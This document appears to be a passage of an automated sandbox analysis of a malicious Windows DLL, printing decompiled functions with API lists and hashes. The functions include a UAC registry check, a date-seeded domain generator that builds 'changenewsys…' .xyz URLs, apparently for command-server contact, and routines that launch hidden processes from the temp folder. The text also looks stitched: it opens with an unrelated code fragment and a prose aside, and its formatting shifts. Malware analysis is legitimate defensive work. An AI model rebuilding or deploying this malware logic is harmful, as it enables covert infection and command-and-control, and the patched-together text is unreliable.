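    return check_idioms(-4096, 4096) ? 0 : 1;
}
```

The two branches of the original are equivalent because MSVC lowered `len / 8 * 8 + 8` and `len + 8` separately after constant-folding the remainder test; reading them as one rule, padded size = next multiple of 8 strictly greater than len, is what matters when sizing decryptors or matching the encoded strings by length.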

                                                                                                                                                 Statement addresses for E100223F0 (one address per decompiled statement of the listing above; the instruction column was not captured):
                                                                                                                                                 0x100223f0 0x100223f0 0x100223f0 0x100223f9 0x100223fe 0x10022401 0x10022407 0x1002240a
                                                                                                                                                 0x10022410 0x10022413 0x10022418 0x1002241e 0x10022424 0x1002242a 0x10022430 0x10022444
                                                                                                                                                 0x10022457 0x1002246c 0x10022474 0x10022480 0x10022483 0x10022490 0x10022495 0x1002249b
                                                                                                                                                 0x1002249b 0x1002249e 0x100224be 0x100224be 0x100224c1 0x100224a0 0x100224a3 0x100224a4
                                                                                                                                                 0x100224b3 0x100224b3 0x100224d6 0x100224e6 0x10022503 0x10022521 0x10022532 0x1002254a
                                                                                                                                                 0x10022559 0x10022572 0x1002258b 0x1002258e 0x100225a5 0x100225b0 0x100225b1 0x100225c2

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$_strlen
                                                                                                                                                • String ID: explorer$rundll32
                                                                                                                                                • API String ID: 1975251954-2912785976
                                                                                                                                                • Opcode ID: c1e6a0fdb6488fddb4f6070d290b58589a25d59a5c82d9815c184508ac71ae6d
                                                                                                                                                • Instruction ID: 8d15330d89fc5d0acd7d9b91591f78a2dd970f15495d3f7c9849200120727594
                                                                                                                                                • Opcode Fuzzy Hash: c1e6a0fdb6488fddb4f6070d290b58589a25d59a5c82d9815c184508ac71ae6d
                                                                                                                                                • Instruction Fuzzy Hash: 84515FBAD00218ABDB14DB98DC92FEEB3B9EB4C304F044199E50997341E635BB54CF95
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

C-Code - Quality: 100%
E1001DC00(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
	struct _OSVERSIONINFOW _v284;
	char _v547;
	char _v548;
	char _v819;
	char _v820;
	char _v824;
	void* _t31;
	void* _t38;
	void* _t41;
	void* _t49;
	void* _t50;
	void* _t51;
	void* _t53;
	void* _t57;
	void* _t69;
	void* _t70;
	void* _t71;
	void* _t74;
	void* _t75;
	void* _t77;

	_t69 = __esi;
	_t68 = __edi;
	_t57 = __ebx;
	if(_a4 == 0) {
		return _t31;
	}
	_v820 = 0;
	E1000CF20(__edi,  &_v819, 0, 0x103);
	_v548 = 0;
	_t58 =  &_v547;
	E1000CF20(_t68,  &_v547, 0, 0x103);
	_t65 =  &(_v284.dwMajorVersion);
	E1000CF20(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
	_t74 = _t71 + 0x24;
	_v284.dwOSVersionInfoSize = 0x114;
	GetVersionExW( &_v284);
	if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2 || E1001D240() == 0) {
		_t38 = E1001D7E0(_t68,  &_v548);
		_t75 = _t74 + 4;
		__eflags = _t38;
		if(_t38 != 0) {
			L11:
			E1001D2D0(_t58,  &_v548);
			_t65 =  &_v820;
			_t41 = E1001CCF0( &_v820, 0x104,  &_v824);
			_t77 = _t75 + 0x10;
			__eflags = _t41;
			if(_t41 >= 0) {
				_t65 = 0x104 - _v824;
				__eflags = 0x104;
				E1001CC50( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
				_t77 = _t77 + 0xc;
			}
			goto L13;
		}
		_t49 = E1001D560(_t68,  &_v548);
		_t75 = _t75 + 4;
		__eflags = _t49;
		if(_t49 != 0) {
			goto L11;
		}
		_t58 =  &_v548;
		_t50 = E1001DA70(_t68,  &_v548);
		_t75 = _t75 + 4;
		__eflags = _t50;
		if(_t50 != 0) {
			goto L11;
		}
		_t65 =  &_v548;
		_t51 = E1001D370(_t57, _t68, _t69,  &_v548);
		_t77 = _t75 + 4;
		__eflags = _t51;
		if(_t51 == 0) {
			goto L13;
		}
		goto L11;
	} else {
		_t53 = E1001DA70(_t68,  &_v548);
		_t77 = _t74 + 4;
		_t84 = _t53;
		if(_t53 != 0) {
			_t65 =  &_v548;
			E1001D2D0( &_v548,  &_v548);
			E1001D320(_t84,  &_v820,  &_v548);
			_t77 = _t77 + 0xc;
		}
		L13:
		if(_v820 == 0) {
			_t65 =  &_v820;
			E1001CFA0("Mid2Failed", 0x104,  &_v820);
			_t77 = _t77 + 0xc;
		}
		return E1000D8A3(_t65, _a4, 0x104,  &_v820);
	}
}

APIs
• _memset.LIBCMT ref: 1001DC28
• _memset.LIBCMT ref: 1001DC45
• _memset.LIBCMT ref: 1001DC5B
• GetVersionExW.KERNEL32(00000114), ref: 1001DC74
• _strcpy_s.LIBCMT ref: 1001DDA9
  • Part of subcall function 1001D240: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
  • Part of subcall function 1001D240: RegQueryValueExW.ADVAPI32(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
  • Part of subcall function 1001D240: RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
  • Part of subcall function 1001DA70: wsprintfW.USER32 ref: 1001DABC
  • Part of subcall function 1001DA70: CreateFileW.KERNEL32(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
  • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB21
  • Part of subcall function 1001DA70: DeviceIoControl.KERNEL32 ref: 1001DB50
  • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB68
  • Part of subcall function 1001DA70: CloseHandle.KERNEL32(000000FF), ref: 1001DBB4
  • Part of subcall function 1001D2D0: _strlen.LIBCMT ref: 1001D2DE
Strings
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$Close$ControlCreateDeviceFileHandleOpenQueryValueVersion_strcpy_s_strlenwsprintf
                                                                                                                                                • String ID: Mid2Failed
                                                                                                                                                • API String ID: 2934472556-1001836097
                                                                                                                                                • Opcode ID: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                • Instruction ID: aa707a60008127caf2ce8d05e14bba9426138a7f06fddb79af8b759b423a3348
                                                                                                                                                • Opcode Fuzzy Hash: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                • Instruction Fuzzy Hash: 224184B5C0021967EB14F7A0AC86FEA737DEB14744F4404A9EA0899142F771FBC8CB92
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 81%
                                                                                                                                                			E100225D0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                				char _v8;
                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                				struct _SYSTEMTIME _v36;
                                                                                                                                                				char _v303;
                                                                                                                                                				char _v304;
                                                                                                                                                				char _v332;
                                                                                                                                                				char _v360;
                                                                                                                                                				char _v388;
                                                                                                                                                				signed int _v392;
                                                                                                                                                				intOrPtr _v396;
                                                                                                                                                				intOrPtr _v400;
                                                                                                                                                				intOrPtr _v404;
                                                                                                                                                				intOrPtr _v408;
                                                                                                                                                				void* __ebp;
                                                                                                                                                				intOrPtr _t91;
                                                                                                                                                
                                                                                                                                                				_t97 = __eflags;
                                                                                                                                                				_t89 = __edi;
                                                                                                                                                				_push(0xffffffff);
                                                                                                                                                				_push(E10022A77);
                                                                                                                                                				_push( *[fs:0x0]);
                                                                                                                                                				 *[fs:0x0] = _t91;
                                                                                                                                                				_v392 = 0;
                                                                                                                                                				E10001160( &_v332, __eflags, "http://");
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				_v304 = 0;
                                                                                                                                                				E1000CF20(__edi,  &_v303, 0, 0x103);
                                                                                                                                                				_v36.wYear = 0;
                                                                                                                                                				_v36.wMonth = 0;
                                                                                                                                                				_v36.wDay = 0;
                                                                                                                                                				_v36.wMinute = 0;
                                                                                                                                                				_v36.wMilliseconds = 0;
                                                                                                                                                				GetLocalTime( &_v36);
                                                                                                                                                				_push(_v36.wDay & 0x0000ffff);
                                                                                                                                                				_push(_v36.wMonth & 0x0000ffff);
                                                                                                                                                				E1000CC93(_t89,  &_v304, "changenewsys%04d%02d%02d", _v36.wYear & 0x0000ffff);
                                                                                                                                                				_v20 = E1001A480(__ebx, _v36.wYear & 0x0000ffff, _t89, __esi, _t97,  &_v304);
                                                                                                                                                				_v396 = E10001160( &_v360, _t97, _v20);
                                                                                                                                                				_v400 = _v396;
                                                                                                                                                				_v8 = 1;
                                                                                                                                                				E10001A70( &_v332, _v400);
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				E100011A0( &_v360);
                                                                                                                                                				_push(_v20);
                                                                                                                                                				E1000CA30(__ebx, _t89, __esi, _t97);
                                                                                                                                                				_v404 = E10001160( &_v388, _t97, ".xyz/");
                                                                                                                                                				_v408 = _v404;
                                                                                                                                                				_v8 = 2;
                                                                                                                                                				E10001A70( &_v332, _v408);
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				E100011A0( &_v388);
                                                                                                                                                				E10001110(_a4, _t97,  &_v332);
                                                                                                                                                				_v392 = _v392 | 0x00000001;
                                                                                                                                                				_v8 = 0xffffffff;
                                                                                                                                                				E100011A0( &_v332);
                                                                                                                                                				 *[fs:0x0] = _v16;
                                                                                                                                                				return _a4;
                                                                                                                                                			}

                                                                                                                                                0x100225d0
                                                                                                                                                0x100225d0
                                                                                                                                                0x100225d3
                                                                                                                                                0x100225d5
                                                                                                                                                0x100225e0
                                                                                                                                                0x100225e1
                                                                                                                                                0x100225ee
                                                                                                                                                0x10022603
                                                                                                                                                0x10022608
                                                                                                                                                0x1002260f
                                                                                                                                                0x10022624
                                                                                                                                                0x1002262c
                                                                                                                                                0x10022634
                                                                                                                                                0x10022637
                                                                                                                                                0x1002263a
                                                                                                                                                0x1002263d
                                                                                                                                                0x10022645
                                                                                                                                                0x1002264f
                                                                                                                                                0x10022654
                                                                                                                                                0x10022666
                                                                                                                                                0x1002267d
                                                                                                                                                0x1002268f
                                                                                                                                                0x1002269b
                                                                                                                                                0x100226a1
                                                                                                                                                0x100226b2
                                                                                                                                                0x100226b7
                                                                                                                                                0x100226c1
                                                                                                                                                0x100226c9
                                                                                                                                                0x100226ca
                                                                                                                                                0x100226e2
                                                                                                                                                0x100226ee
                                                                                                                                                0x100226f4
                                                                                                                                                0x10022705
                                                                                                                                                0x1002270a
                                                                                                                                                0x10022714
                                                                                                                                                0x10022723
                                                                                                                                                0x10022731
                                                                                                                                                0x10022737
                                                                                                                                                0x10022744
                                                                                                                                                0x1002274f
                                                                                                                                                0x10022759

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 10022624
                                                                                                                                                • GetLocalTime.KERNEL32(00000000,?,?,http://), ref: 10022645
                                                                                                                                                • _sprintf.LIBCMT ref: 10022666
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                  • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                  • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                  • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                  • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                  • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                  • Part of subcall function 1000CA30: RtlFreeHeap.NTDLL(00000000,?,103301D0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                  • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301D0), ref: 1000CAA9
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                 • Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                 • Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$_sprintf_strlen$ErrorFreeHeapLastLocalTime___sbh_find_block___sbh_free_block
                                                                                                                                                • String ID: .xyz/$changenewsys%04d%02d%02d$http://
                                                                                                                                                • API String ID: 984892819-377150047
                                                                                                                                                • Opcode ID: 01893e789d72bc6740a2a515bf2c20aba140765a16ad56bf668e112c6c4f99eb
                                                                                                                                                • Instruction ID: 81f1802f078645e924587200c16c269d37407c15be22a51fe8bac89201a43415
                                                                                                                                                • Opcode Fuzzy Hash: 01893e789d72bc6740a2a515bf2c20aba140765a16ad56bf668e112c6c4f99eb
                                                                                                                                                • Instruction Fuzzy Hash: 08412975C04228ABDB14CBA4DC51BEEB7B4EF08744F4081E9F509A7291EB346B84CF91
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 67%
                                                                                                                                                			E1001FEA0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                                                                                				char _v8;
                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                				char _v44;
                                                                                                                                                				char _v311;
                                                                                                                                                				char _v312;
                                                                                                                                                				char _v575;
                                                                                                                                                				char _v576;
                                                                                                                                                				void* _t30;
                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                				void* _t50;
                                                                                                                                                
                                                                                                                                                				_t50 = __eflags;
                                                                                                                                                				_t41 = __edi;
                                                                                                                                                				_push(0xffffffff);
                                                                                                                                                				_push(E10022AF1);
                                                                                                                                                				_push( *[fs:0x0]);
                                                                                                                                                				 *[fs:0x0] = _t43;
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				_v576 = 0;
                                                                                                                                                				E1000CF20(__edi,  &_v575, 0, 0x103);
    _v312 = 0;
    E1000CF20(_t41, &_v311, 0, 0x103);
    E1001A600(__ebx, _t41, __esi, _t50, &_v44);
    GetTempPathA(0x104, &_v576);
    _push(E100011E0(&_a4));
    _push("0011");
    _push(E100011E0(&_v44));
    E1000CC93(_t41, &_v312, "%s%s %s %s", &_v576);
    E1001A1D0(_t50, &_v312);
    E100011A0(&_v44);
    _v8 = 0xffffffff;
    _t30 = E100011A0(&_a4);
    *[fs:0x0] = _v16;
    return _t30;
}

APIs
• _memset.LIBCMT ref: 1001FEDA
• _memset.LIBCMT ref: 1001FEF7
  • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
  • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
  • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
• GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FF17
• _sprintf.LIBCMT ref: 1001FF47
  • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
  • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
  • Part of subcall function 1001A1D0: CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
  • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
  • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
• String ID: %s%s %s %s$0011
• API String ID: 3552933064-2132516514
• Opcode ID: 1d9b09cfca39a609c0d1c4b04c45a75235e20a1c535110d9b18c7a09704cf595
• Instruction ID: 67bf52551a5dba2018d4aeac715347b552078b1bc39281a068a263b1fa8e7f35
• Opcode Fuzzy Hash: 1d9b09cfca39a609c0d1c4b04c45a75235e20a1c535110d9b18c7a09704cf595
• Instruction Fuzzy Hash: D411B6B6C00248ABE714EB90DC96FDD777CEB14750F4041A4FA19661C1EB747B48CBA1
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
E1001A1D0(void* __eflags, CHAR* _a4) {
    struct _PROCESS_INFORMATION _v20;
    CHAR* _v24;
    struct _STARTUPINFOA _v100;
    void* _t27;

    _v24 = 0;
    E1000CF20(_t27, &_v100, 0, 0x44);
    _v100.cb = 0x44;
    _v100.dwFlags = 1;
    _v100.wShowWindow = 0;
    E1000CF20(_t27, &_v20, 0, 0x10);
    if(CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, &_v100, &_v20) != 0) {
        CloseHandle(_v20.hThread);
        CloseHandle(_v20);
        _v24 = 1;
    }
    return _v24;
}

APIs
• _memset.LIBCMT ref: 1001A1E5
• _memset.LIBCMT ref: 1001A209
• CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
• CloseHandle.KERNEL32(?), ref: 1001A239
• CloseHandle.KERNEL32(?), ref: 1001A243
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: CloseHandle_memset$CreateProcess
• String ID: D
• API String ID: 1151464618-2746444292
• Opcode ID: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
• Instruction ID: ef4eb28381490467371c772dbf4cc47cae63647d7d2172f01b5caa4c4fe940a9
• Opcode Fuzzy Hash: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
• Instruction Fuzzy Hash: 8601E1B590031DABEB00DBD0DC8AFEE77B9FB44704F144518FA04AB285D7B5A904CBA5
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
E1001AEB0(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8) {
    intOrPtr _v8;
    signed int _v12;
    intOrPtr* _v16;
    intOrPtr* _v20;
    intOrPtr _v24;
    intOrPtr _v28;
    intOrPtr _v32;
    intOrPtr* _v36;
    intOrPtr* _v40;
    intOrPtr* _v44;
    intOrPtr* _t105;
    void* _t174;
    void* _t176;

    _t172 = __edi;
    _t122 = __ebx;
    _v16 = _a4;
    _t4 = _v16 + 4; // 0x7d83ec45
    _v24 = *_t4;
    _v12 = 0;
    _v20 = *_v16 + 0x78;
    if( *((intOrPtr*)(_v20 + 4)) != 0) {
        _v8 = _v24 + *_v20;
        if( *(_v8 + 0x18) == 0 || *((intOrPtr*)(_v8 + 0x14)) == 0) {
            SetLastError(0x7f);
            return 0;
        } else {
            if((_a8 >> 0x00000010 & 0x0000ffff) != 0) {
                if( *(_v8 + 0x18) != 0) {
                    if( *((intOrPtr*)(_v16 + 0x30)) != 0) {
                        L19:
                        _t70 = _v16 + 0x30; // 0x51e84d8b
                        _v28 = E1000DF58(_t122, &_a8, *_t70, *(_v8 + 0x18), 8, E1001AA60);
                        if(_v28 != 0) {
                            _v12 = *(_v28 + 4) & 0x0000ffff;
                            L22:
                            if(_v12 <= *((intOrPtr*)(_v8 + 0x14))) {
                                return _v24 + *((intOrPtr*)(_v24 + *((intOrPtr*)(_v8 + 0x1c)) + _v12 * 4));
                            }
                            SetLastError(0x7f);
                            return 0;
                        }
                        SetLastError(0x7f);
                        return 0;
                    }
                    _v36 = _v24 + *((intOrPtr*)(_v8 + 0x20));
                    _v40 = _v24 + *((intOrPtr*)(_v8 + 0x24));
                    _t105 = L1000CE56(__ebx, _v24 + *((intOrPtr*)(_v8 + 0x24)), __edi, __esi, *(_v8 + 0x18) << 3);
                    _t176 = _t174 + 4;
                    _v44 = _t105;
                    *((intOrPtr*)(_v16 + 0x30)) = _v44;
                    if(_v44 != 0) {
                        _v32 = 0;
                        while(_v32 < *(_v8 + 0x18)) {
                            *_v44 = _v24 + *_v36;
                            *((short*)(_v44 + 4)) = *_v40;
                            _v32 = _v32 + 1;
                            _v36 = _v36 + 4;
                            _v40 = _v40 + 2;
                            _v44 = _v44 + 8;
                        }
                        _t66 = _v16 + 0x30; // 0x51e84d8b
                        E1000D9D0( *(_v8 + 0x18), _t172, *_t66, *(_v8 + 0x18), 8, E1001AA90);
                        _t174 = _t176 + 0x10;
                        goto L19;
                    }
                    SetLastError(0xe);
                    return 0;
                }
                SetLastError(0x7f);
                return 0;
            }
            if((_a8 & 0xffff) >= *((intOrPtr*)(_v8 + 0x10))) {
                _v12 = (_a8 & 0xffff) - *((intOrPtr*)(_v8 + 0x10));
                goto L22;
                                                                                                                                                						}
                                                                                                                                                						SetLastError(0x7f);
                                                                                                                                                						return 0;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				SetLastError(0x7f);
                                                                                                                                                				return 0;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AEE2
                                                                                                                                                • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,100207FE), ref: 1001AF0E
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ErrorLast
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1452528299-0
                                                                                                                                                • Opcode ID: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
                                                                                                                                                • Instruction ID: 0b553024b132d835b53bcc3061d3cd906e00f9f3519ff007c74d2c873b7cba87
                                                                                                                                                • Opcode Fuzzy Hash: 0f455f5a677937442b34762e6ef3df5d8741d0011f32a81b29d44a10479100eb
                                                                                                                                                • Instruction Fuzzy Hash: A071D274A00249EFDB04CF94C994AAEB7F1FF48304F618199E915AB341D735EE81CBA5
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 71%
                                                                                                                                                			E1001FDC0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                                                                                				char _v8;
                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                				char _v44;
                                                                                                                                                				char _v311;
                                                                                                                                                				char _v312;
                                                                                                                                                				char _v575;
                                                                                                                                                				char _v576;
                                                                                                                                                				void* _t30;
                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                				void* _t50;
                                                                                                                                                
                                                                                                                                                				_t50 = __eflags;
                                                                                                                                                				_t41 = __edi;
                                                                                                                                                				_push(0xffffffff);
                                                                                                                                                				_push(E10022ADF);
                                                                                                                                                				_push( *[fs:0x0]);
                                                                                                                                                				 *[fs:0x0] = _t43;
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				_v576 = 0;
                                                                                                                                                				E1000CF20(__edi,  &_v575, 0, 0x103);
                                                                                                                                                				_v312 = 0;
                                                                                                                                                				E1000CF20(_t41,  &_v311, 0, 0x103);
                                                                                                                                                				E1001A600(__ebx, _t41, __esi, _t50,  &_v44);
                                                                                                                                                				GetTempPathA(0x104,  &_v576);
                                                                                                                                                				_push(E100011E0( &_a4));
                                                                                                                                                				_push(E100011E0( &_v44));
                                                                                                                                                				E1000CC93(_t41,  &_v312, "%s%s 200 %s",  &_v576);
                                                                                                                                                				E1001A1D0(_t50,  &_v312);
                                                                                                                                                				E100011A0( &_v44);
                                                                                                                                                				_v8 = 0xffffffff;
                                                                                                                                                				_t30 = E100011A0( &_a4);
                                                                                                                                                				 *[fs:0x0] = _v16;
                                                                                                                                                				return _t30;
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                • _memset.LIBCMT ref: 1001FDFA
                                                                                                                                                • _memset.LIBCMT ref: 1001FE17
                                                                                                                                                  • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                  • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                  • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FE37
                                                                                                                                                • _sprintf.LIBCMT ref: 1001FE62
                                                                                                                                                  • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                  • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                  • Part of subcall function 1001A1D0: CreateProcessA.KERNEL32(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                  • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                  • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                • String ID: %s%s 200 %s
                                                                                                                                                • API String ID: 3552933064-2772210913
                                                                                                                                                • Opcode ID: 6fdab2317e9cd2bac910ebd3285d2722730a43824be4673878b61a9fbd94f7f4
                                                                                                                                                • Instruction ID: 9fe4303920e8fa691f1d764f20975ef76de67e86ffe0158f2e00fcfb91787ceb
                                                                                                                                                • Opcode Fuzzy Hash: 6fdab2317e9cd2bac910ebd3285d2722730a43824be4673878b61a9fbd94f7f4
                                                                                                                                                • Instruction Fuzzy Hash: 341198B6C00208ABE714EB90DC56FDE7778EB14750F4441A4F615A61C5EB747B88CBA1
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                			E1001F990(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                				intOrPtr _v8;
                                                                                                                                                				char _v12;
                                                                                                                                                				char _v275;
                                                                                                                                                				char _v276;
                                                                                                                                                				void* __ebp;
                                                                                                                                                				void* _t20;
                                                                                                                                                				void* _t37;
                                                                                                                                                
                                                                                                                                                				_t37 = __eflags;
                                                                                                                                                				_t28 = __edi;
                                                                                                                                                				_v276 = 0;
                                                                                                                                                				E1000CF20(__edi,  &_v275, 0, 0x103);
                                                                                                                                                				_v12 = 0x104;
